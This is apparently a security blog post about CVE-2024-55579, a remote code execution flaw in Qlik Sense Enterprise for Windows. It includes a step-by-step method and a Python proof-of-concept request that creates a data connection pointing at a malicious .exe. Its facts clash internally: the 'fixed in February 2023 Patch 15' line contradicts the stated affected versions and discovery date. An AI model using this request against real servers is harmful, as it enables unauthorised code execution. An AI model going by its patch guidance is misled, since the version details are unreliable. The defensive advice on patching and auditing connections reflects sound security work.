CVE-2024-55579 - How One Flaw Allowed Hackers to Run EXE Programs in Qlik Sense

Qlik Sense is a popular business intelligence tool used by thousands of organizations to visualize and analyze their critical data. But in early 2024, a severe security flaw—now labeled CVE-2024-55579—was discovered in Qlik Sense Enterprise for Windows. This vulnerability could let almost anyone on a network run malicious programs on a company’s Qlik Sense server. Here’s how the bug worked, how attackers could exploit it, and what you need to do to stay safe.

What is CVE-2024-55579?

CVE-2024-55579 is a vulnerability impacting Qlik Sense Enterprise for Windows versions prior to the November 2024 Initial Release (IR). Specifically, this flaw allows any user—even those with the lowest level of access—to create certain “connection objects” inside Qlik Sense that can force the server to execute any .exe file they want. Once an attacker does this, they have the same power as if they were sitting at the actual Windows computer running Qlik Sense.

No need for high privileges: Attackers don’t need to be admins or privileged users.

- Only network access is needed: Just being able to connect to Qlik Sense over the network is enough.
- Full remote code execution: Any executable (.exe)—from ransomware and password stealers to remote access trojans—can run on the Qlik server.

How The Exploit Works

Normally, Qlik Sense connections (like database or data file connections) should be limited to safe locations. But in vulnerable versions, an attacker could abuse this system to point the connection at a specially crafted .exe file.

Here’s a simplified breakdown

Step 1: Log in as a normal Qlik user
Step 2: Create a new connection object and configure it to reference a malicious .exe file (perhaps from a network share or uploaded into a writable folder on the server)
Step 3: Trigger the object (e.g., by loading data), causing the Qlik Engine to execute the .exe file with the server’s permissions

Code Snippet: Proof of Concept

Below is a proof-of-concept request using Python that abuses this flaw. This assumes you have valid (unprivileged) Qlik credentials.

import requests

qlik_url = 'https://qlikserver.example.com/qrs/dataConnection';
headers = {
    'X-Qlik-User': 'UserDirectory=INTERNAL;UserId=unprivuser',  # Replace with valid username
    'Content-Type': 'application/json'
}
payload = {
    "name": "evil-exe",
    "connectionString": "file:///C:/Path/To/MyMalware.exe",
    "type": "folder",  # or another suitable type
    "engineObjectType": "DataConnection",
    "authenticationMethod": "anonymous"
}

resp = requests.post(qlik_url, headers=headers, json=payload, verify=False)
print(f'Status code: {resp.status_code}')
print(f'Response: {resp.text}')

This code tries to create a new Data Connection that points to a Windows executable. Under the hood, the Qlik engine might try to execute the file when scanning the “folder” or doing preview/data load—depending on server settings and install paths.

Affected and Fixed Versions

Impacted products:

Qlik Sense Enterprise for Windows (before November 2024 IR)

Fixed in:

February 2023 Patch 15

If your Qlik Sense server is running an older patch, you’re putting your company at serious risk.

Patch immediately: Update to the latest patch level mentioned above.

2. Check for suspicious Data Connections: Go through your Qlik environment and look for connections referencing .exe files or pointing to strange directory paths.
3. Monitor for logins from unusual users: Attackers may use low-privileged accounts to sneak in and plant exploit connections.

References and Further Reading

- Qlik Security Bulletin - Qlik Sense Enterprise for Windows: Multiple vulnerabilities (CVE-2024-55579)
- NIST National Vulnerability Database: CVE-2024-55579

Final Thoughts

CVE-2024-55579 is a stark reminder of why patching business-critical software quickly (and monitoring how users can move inside your environment) is so important. If you use Qlik Sense Enterprise, check your version and apply the necessary fixes today. One missed patch could be all it takes for an attacker to turn your analytics goldmine into their launchpad for cybercrime.
Stay secure!


Got questions about this issue or want more mitigation tips? Comment below or reach out, and let’s keep your data safe.

Timeline

Published on: 12/09/2024 03:15:05 UTC
Last modified on: 12/10/2024 15:15:08 UTC